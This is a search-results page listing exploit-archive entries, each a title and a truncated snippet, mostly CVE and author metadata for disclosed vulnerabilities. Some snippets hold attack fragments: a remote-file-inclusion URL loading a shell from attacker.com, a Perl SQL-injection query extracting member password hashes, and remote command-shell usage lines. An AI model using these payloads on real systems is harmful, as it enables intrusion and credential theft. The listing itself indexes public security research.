41207 matches found
Asterisk chan_pjsip 15.2.0 - SUBSCRIBE Stack Corruption
Asterisk chanpjsip 15.2.0 - SUBSCRIBE Stack Corruption ''' SUBSCRIBE message with a large Accept value causes stack corruption - Authors: - Alfred Farrugia - Sandro Gauci - Latest vulnerable version: Asterisk 15.2.0 running chanpjsip - Tested vulnerable versions: 15.2.0, 13.19.0, 14.7.5, 13.11.2 ...
Asterisk 13.17.2 - chan_skinny Remote Memory Corruption
Asterisk 13.17.2 - chanskinny Remote Memory Corruption Exploit Author: Juan Sacco - http://exploitpack.com Vulnerability found using Exploit Pack v10 - Fuzzer module CVE-2017-17090 - AST-2017-013 Tested on: Asterisk 13.17.2dfsg-2 Description: Asterisk is prone to a remote unauthenticated memory...
HPE iLO 4 2.53 - Add New Administrator User
HPE iLO 4 2.53 - Add New Administrator User !/usr/bin/env python """ Exploit trigger was presented @reconbrx 2018 Vulnerability found and documented by synacktiv: https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html Original advisory from HP:...
Linux Kernel 3.10.0 (CentOS RHEL 7.1) - visor treo_attach Nullpointer Dereference
Linux Kernel 3.10.0 CentOS RHEL 7.1 - visor treoattach Nullpointer Dereference OS-S Security Advisory 2016-10 Linux visor treoattach Nullpointer Dereference Date: March 4th, 2016 Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg CVE: CVE-2016-2782 CVSS: 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C...
Microsoft Windows - OLE Remote Code Execution Sandworm (MS14-060)
Microsoft Windows - OLE Remote Code Execution Sandworm MS14-060 !/usr/bin/python Windows OLE RCE Exploit MS14-060 CVE-2014-4114 Sandworm Author: Mike Czumak Tv3rn1x - @SecuritySift Written: 10/21/2014 Tested Platforms: Windows 7 SP1 w/ exploit script run on Kali Linux You are free to reuse this...
NTP ntpd monlist Query Reflection - Denial of Service
NTP ntpd monlist Query Reflection - Denial of Service / Exploit Title: CVE-2013-5211 PoC - NTP DDoS amplification Date: 28/04/2014 Code Author: Danilo PC - CVE : CVE-2013-5211 / / I coded this program to help other to understand how an DDoS attack amplified by NTP servers works CVE-2013-5211 I to...
Tableau Server 8.0.7 8.1.2 - Blind SQL Injection
Tableau Server 8.0.7 8.1.2 - Blind SQL Injection Trustwave's SpiderLabs Security Advisory TWSL2014-003: Blind SQL Injection Vulnerability in Tableau Server Published: 02/07/14 Version: 1.1 Vendor: Tableau Software http://www.tableausoftware.com Product: Tableau Server Versions affected: 8.1.X...
Guru JustAnswer Professional 1.25 - Multiple SQL Injections
Guru JustAnswer Professional 1.25 - Multiple SQL Injections / / / \ \ \ \ \ / / \\ \ \ \ \ // /// \ \ / / \ //|\ / \ \ \ \ \ \ / / \ \ / / \ | | | \ | | || | | |/ / \ V / || |\ V / / \ | / \ | /| | | || / | | | | . | ' || / | || // \ // \|||/|||||||||\ .WEB.ID...
ASX to MP3 Converter 3.1.2.1 - Multiple OS ASLR + DEP Bypass (SEH) (Metasploit)
ASX to MP3 Converter 3.1.2.1 - Multiple OS ASLR + DEP Bypass SEH Metasploit Exploit Title: ASX to MP3 Converter v3.1.2.1 SEH Exploit Multiple OS, DEP and ASLR Bypass Date: July 13, 2010 Author: Node Software Link: http://www.mini-stream.net/downloads/ASXtoMP3Converter.exe Version: Mini-Stream...
Sunbird 0.9 - Array Overrun Code Execution
Sunbird 0.9 - Array Overrun Code Execution full disclosure: http://seclists.org/fulldisclosure/2009/Dec/253 Sunbird 0.9 Array Overrun code execution Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - Dis.: 07.05.2009 - Pub.: 11.12.2009 CVE: CVE-2009-0689 CWE: CWE-199 Risk:...
Kide Shoutbox 0.4.6 - Cross-Site Scripting AXFR
Kide Shoutbox 0.4.6 - Cross-Site Scripting AXFR andresg888 Web: : www.ilegalintrusion.net & www.bl4ck-p0rtal.org Exploit : Go to the shoutbox and type: red text or hi or 3xplo!t : http://server/path/include/prodler.class.php?sPath=http://attacker.com/shell.txt??? Greetz : 84kur10 , Brunos50 Speci...
Les Visiteurs (Visitors) 2.0 - config.inc.php File Inclusion
Les Visiteurs Visitors 2.0 - config.inc.php File Inclusion ============================================================================================== lesvisit visiteurs = v2.0 lvcincludedir Remote File Include Vulnerability...
Invision Power Board 2.1 2.1.6 - SQL Injection (2)
Invision Power Board 2.1 2.1.6 - SQL Injection 2 !/usr/bin/perl use LWP::UserAgent; $ua = LWP::UserAgent-new; &header; if @ARGV ".$server."result.txt"; for$id = 1; $id = $kol; $id++ $ownquery = "UNION SELECT convergepasshash,1,1,1 FROM ".$prefix."membersconverge WHERE convergeid=".$id."/";...
ActiveFax Server 6.92 Build 0316 - POP3 Server Denial of Service
ActiveFax Server 6.92 Build 0316 - POP3 Server Denial of Service Exploit Title: ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service Date: 2019-10-12 Vendor Homepage: https://www.actfax.com/ Software Link : https://www.actfax.com/download/actfaxsetupx64ge.exe Exploit Author: Achille...
Dolibarr ERP-CRM 10.0.1 - SQL Injection
Dolibarr ERP-CRM 10.0.1 - SQL Injection Exploit Title: Dolibarr ERP/CRM - Multiple Sql Injection Exploit Author: Metin Yunus Kandemir kandemir Vendor Homepage: https://www.dolibarr.org/ Software Link: https://www.dolibarr.org/downloads Version: 10.0.1 Category: Webapps Tested on: Xampp for Linux...
LibreOffice 6.2.6 Macro - Python Code Execution (Metasploit)
LibreOffice 6.2.6 Macro - Python Code Execution Metasploit This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LibreOffice Macro Python Code Execution', 'Description' = %q LibreOffice comes bundled...
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting Author Information Author : Ahmed Elhady Mohamed twitter : @AhmedELhady Date : 01/07/2018 Software Information Affected Software : SeoChecker Umbraco CMS Plug-in Version: version 1.9.2 Software website :...
Hanbanggaoke IP Camera - Arbitrary Password Change
Hanbanggaoke IP Camera - Arbitrary Password Change Vulnerability summary The following advisory describes an arbitrary password change vulnerability found in Hanbanggaoke webcams. Beijing Hanbang Technology, “one of the first enterprises entering into digital video surveillance industry, has been...
Joomla! 3.7.0 - com_fields SQL Injection
Joomla! 3.7.0 - comfields SQL Injection Exploit Title: Joomla 3.7.0 - Sql Injection Date: 05-19-2017 Exploit Author: Mateus Lino Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html Vendor Homepage: https://www.joomla.org/ Version: = 3.7.0 Tested on: Win, Kali...
Microsoft-Office-2007-and-2010---OLE-Arbitrary-Command-Execution
CVE-2014-6352 OLE Remote Code Execution Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Advanced Hacking Trainings - http://training.aslitsecurity.com Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/ Tested on win7 - office 2007 and 2010...
Enalean Tuleap 7.2 - XML External Entity File Disclosure
Enalean Tuleap 7.2 - XML External Entity File Disclosure Vulnerability title: Tuleap = 7.2 External XML Entity Injection in Enalean Tuleap CVE: CVE-2014-7177 Vendor: Enalean Product: Tuleap Affected version: 7.2 and earlier Fixed version: 7.4.99.5 Reported by: Jerzy Kramarz Details: A multiple XM...
MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution
MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution Title: MongoDB nativeHelper.apply Remote Code Execution Author: agixid http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/ Software Link: http://fastdl.mongodb.org/linux/mongodb-linux-i686-2.2.3.tgz Version: 2.2.3 The following PoC...
ZenPhoto 1.4.3.3 - Multiple Vulnerabilities
ZenPhoto 1.4.3.3 - Multiple Vulnerabilities waraxe-2012-SA096 - Multiple Vulnerabilities in Zenphoto 1.4.3.3 =============================================================================== Author: Janek Vind "waraxe" Date: 03. November 2012 Location: Estonia, Tartu Web:...
Google Chrome 14.0.835.163 - .pdf File Handling Memory Corruption
Google Chrome 14.0.835.163 - .pdf File Handling Memory Corruption ----------------Security Adisory---------------- Title: Google Chrome = 14.0.835.163 Discovered by: Mario Gomes ----------------Summary---------------- Google Chrome is a web browser developed by Google that uses the WebKit layout...
PHP 5.3.6 - shmop_read() Integer Overflow Denial of Service
PHP 5.3.6 - shmopread Integer Overflow Denial of Service...
GNU libcregcomp(3) - Multiple Vulnerabilities
GNU libcregcomp3 - Multiple Vulnerabilities // source: http://securityreason.com/securityalert/8003 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 GNU libc/regcomp3 Multiple Vulnerabilities Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - - Dis.: 01.10.2010 - -...
Linux Kernel 2.42.6 (RedHat Linux 9 Fedora Core 4 11 Whitebox 4 CentOS 4) - sock_sendpage() Ring0 Privilege Escalation (5)
Linux Kernel 2.42.6 RedHat Linux 9 Fedora Core 4 11 Whitebox 4 CentOS 4 - socksendpage Ring0 Privilege Escalation 5 / 0x82-CVE-2009-2692 Linux kernel 2.4/2.6 32bit socksendpage local ring0 root exploit simple ver Tested RedHat Linux 9.0, Fedora core 411, Whitebox 4, CentOS 4.x. -- Discovered by...
PHPNews 0.93 - format_menue Remote File Inclusion
PHPNews 0.93 - formatmenue Remote File Inclusion ?????????? ??????????????? ??????????????????? ??????????????????????? ?????????????????????????? ?????????????????????????????? ????????????????????????????????? ??????????????????????????????????? ?????????????????????????????????????...
vSpin Classified System 2004 - cat.asp?cat SQL Injection
vSpin Classified System 2004 - cat.asp?cat SQL Injection source: https://www.securityfocus.com/bid/21190/info vSpin Classified System is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because the application fails to sufficiently...
Auction 1.3m - phpbb_root_path Remote File Inclusion
Auction 1.3m - phpbbrootpath Remote File Inclusion !/usr/bin/perl phpBB auction mod - Remote File Inclusion Vuln Bug discovered by VietMafia code copier: webDEViL w3bd3vilatgmail.com code same as Fast Click perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd cmd shell example: cmd...
Multiple Vendor ICMP Implementation - Spoofed Source Quench Packet Denial of Service
Multiple Vendor ICMP Implementation - Spoofed Source Quench Packet Denial of Service source: https://www.securityfocus.com/bid/13124/info Multiple vendor implementations of TCP/IP Internet Control Message Protocol ICMP are reported prone to several denial-of-service attacks. ICMP is employed by...
phpHeaven phpMyChat 0.14.5 - admin.php3 Arbitrary File Access
phpHeaven phpMyChat 0.14.5 - admin.php3 Arbitrary File Access source: https://www.securityfocus.com/bid/10556/info phpHeaven phpMyChat is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data and design flaws. The following specific...
Alfresco 5.2.4 - Persistent Cross-Site Scripting
Alfresco 5.2.4 - Persistent Cross-Site Scripting Exploit Title: Alfresco 5.2.4 - Persistent Cross-Site Scripting Date: 2020-03-02 Exploit Author: Romain LOISEL & Alexandre ZANNI https://pwn.by/noraj - Pentesters from Orange Cyberdefense France Vendor Homepage: https://www.alfresco.com/ Software...
GTalk Password Finder 2.2.1 - Key Denial of Service (PoC)
GTalk Password Finder 2.2.1 - Key Denial of Service PoC Exploit Title: GTalk Password Finder 2.2.1 - 'Key' Denial of Service PoC Exploit Author: Ismail Tasdelen Exploit Date: 2020-01-16 Vendor Homepage : http://www.nsauditor.com/ Link Software :...
Roxy Fileman 1.4.5 - Unrestricted File Upload Directory Traversal
Roxy Fileman 1.4.5 - Unrestricted File Upload Directory Traversal ====================================================================== Exploit Title:: Multiple Vulnerabilities Software: Roxy Fileman Version: 1.4.5 Vendor Homepage: http://www.roxyfileman.com/ Software Link:...
phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)
phpMyAdmin 4.8.1 - Authenticated Local File Inclusion 2 Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution Date: 2018-06-21 Exploit Author: VulnSpy Vendor Homepage: http://www.phpmyadmin.net Software Link:...
Linux Kernel 4.10.5 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free
Linux Kernel 4.10.5 4.14.3 Ubuntu - DCCP Socket Use-After-Free / This is an announcement for CVE-2017-8824 which is a use-after-free vulnerability I found in Linux DCCP socket. It can be used to gain kernel code execution from unprivileged processes. You’ll find in attachment the proof of concept...
Linux Kernel - offset2lib Stack Clash
Linux Kernel - offset2lib Stack Clash / Linuxoffset2lib.c for CVE-2017-1000370 and CVE-2017-1000371 Copyright C 2017 Qualys, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation,...
Microsoft Windows - USP10!otlSinglePosLookup::getCoverageTable Uniscribe Font Processing Out-of-Bounds Memory Read
Microsoft Windows - USP10!otlSinglePosLookup::getCoverageTable Uniscribe Font Processing Out-of-Bounds Memory Read Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1203 We have encountered a crash in the Windows Uniscribe user-mode library, in the...
Cisco IOS 12.2 12.4 15.0 15.6 - Security Association Negotiation Request Device Memory
Cisco IOS 12.2 12.4 15.0 15.6 - Security Association Negotiation Request Device Memory !/usr/bin/python -- coding: utf8 -- import socket from scapy.all import --------------------------- Requirements: $ sudo pip install scapy --------------------------- conf.verb = 0 RCVSIZE = 2548 TIMEOUT = 6...
Microsoft Windows Kernel - win32k.sys Local Privilege Escalation (MS14-058)
Microsoft Windows Kernel - win32k.sys Local Privilege Escalation MS14-058 Sources: https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf https://github.com/sam-b/CVE-2014-4113 EDB Mirror:...
Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)
Persistent Systems Client Automation - Command Injection Remote Code Execution Metasploit Exploit Title: Persistent Systems Client Automation PSCA, formerly HPCA or Radia Command Injection Remote Code Execution Vulnerability Date: 2014-10-01 Exploit Author: Ben Turner Vendor Homepage: Previosuly...
MiCasaVerde VeraLite 1.5.408 - Multiple Vulnerabilities
MiCasaVerde VeraLite 1.5.408 - Multiple Vulnerabilities Trustwave SpiderLabs Security Advisory TWSL2013-019: Multiple Vulnerabilities in MiCasaVerde VeraLite Published: 08/01/13 Version: 1.0 Vendor: MiCasaVerde http://www.micasaverde.com/ Product: VeraLite Version affected: 1.5.408 Product...
Konqueror 4.7.3 - Memory Corruption
Konqueror 4.7.3 - Memory Corruption -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Nth Dimension Security Advisory NDSA20121010 Date: 10th October 2012 Author: Tim Brown URL: / Product: Konqueror 4.7.3 Vendor: KDE Risk: Medium Summary The Konqueror web browser is vulnerable to a number of memory...
GIMP 2.8.0 - .FIT File Format Denial of Service
GIMP 2.8.0 - .FIT File Format Denial of Service Summary ======= There is a file handling DoS in GIMP the GNU Image Manipulation Program for the 'fit' file format affecting all versions Windows and Linux up to and including 2.8.0. A file in the fit format with a malformed 'XTENSION' header will...
VP-ASP Shopping Cart 7.0 - Database Disclosure
VP-ASP Shopping Cart 7.0 - Database Disclosure ======================================================================================== | Title : VP-ASP Shopping Cart 7.0 DB Download Vulnerability | Author : indoushka | email : [email protected] | Home : Souk Naamane - 04325 - Oum El Bouaghi ...
EsFaq 2.0 - idcat SQL Injection
EsFaq 2.0 - idcat SQL Injection || | | EsFaq Remote Sql Injection Exploit | | |---------------------SuB-ZeRo----------------------| | | Author: SuB-ZeRo | | Home : www.dz-security.com | | email: [email protected] | | | | | | | script :http://editeurscripts.com/ressources/scripts-php/dl.php?idscript...
Linux Kernel 2.0.x2.2.x2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure
Linux Kernel 2.0.x2.2.x2.4.x FreeBSD 4.x - Network Device Driver Frame Padding Information Disclosure source: https://www.securityfocus.com/bid/6535/info Network device drivers for several vendors have been reported to disclose potentially sensitive information to attackers. Frames that are small...
Webfroot Shoutbox 2.32 - Expanded.php Remote Command Execution
Webfroot Shoutbox 2.32 - Expanded.php Remote Command Execution source: https://www.securityfocus.com/bid/7772/info Shoutbox is prone to an issue that may result in the execution of attacker-supplied code. The vulnerability exists due to insufficient sanitization of input into the expanded.php...
Core FTP LE 2.2 - Denial of Service (PoC)
Core FTP LE 2.2 - Denial of Service PoC Exploit Title: Core FTP LE 2.2 - Denial of Service PoC Date: 2020-25-02 Exploit Author: Ismael Nava Vendor Homepage: http://www.coreftp.com/ Software Link: http://www.coreftp.com/download.html Version: 2.2 build 1947 Tested on: Windows 10 Home x64 CVE : n/a...